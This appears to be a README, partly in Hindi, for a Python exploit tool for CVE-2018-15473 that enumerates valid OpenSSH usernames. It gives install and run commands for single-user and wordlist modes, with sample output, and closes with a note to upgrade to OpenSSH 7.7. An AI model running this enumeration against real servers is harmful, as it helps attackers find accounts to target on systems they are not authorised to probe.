
CVE-2018-15473 के लिए Python-आधारित शोषण, प्रमाणीकरण प्रतिक्रिया ओरेकल के माध्यम से OpenSSH उपयोगकर्ता नाम गणना को सक्षम करता है, जिसमें एकल-उपयोगकर्ता और वर्डलिस्ट मोड हैं।
SSH उपयोगकर्ता नाम गणना शोषण (OpenSSH 2.3 < 7.7)
मूल शोषण का संपादित संस्करण: https://www.exploit-db.com/exploits/45233
Python3 में परिवर्तित किया गया
उपयोगकर्ता नाम शब्दसूची विकल्प जोड़ा गया
#Install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users:
root
#For more option:
foo@bar:~$ ./Exploit.py -h
सिस्टम वैध और अमान्य प्रमाणीकरण प्रयासों पर अलग-अलग प्रतिक्रिया देता है। एक दूरस्थ उपयोगकर्ता लक्ष्य प्रणाली पर वैध उपयोगकर्ता नाम निर्धारित करने के लिए विशेष रूप से तैयार किए गए अनुरोध भेज सकता है। इस प्रकार, एक दूरस्थ उपयोगकर्ता लक्ष्य प्रणाली पर वैध उपयोगकर्ता नाम निर्धारित कर सकता है।
OpenSSH सर्वर को संस्करण 7.7 या उससे उच्चतर में अपग्रेड किया जाना चाहिए।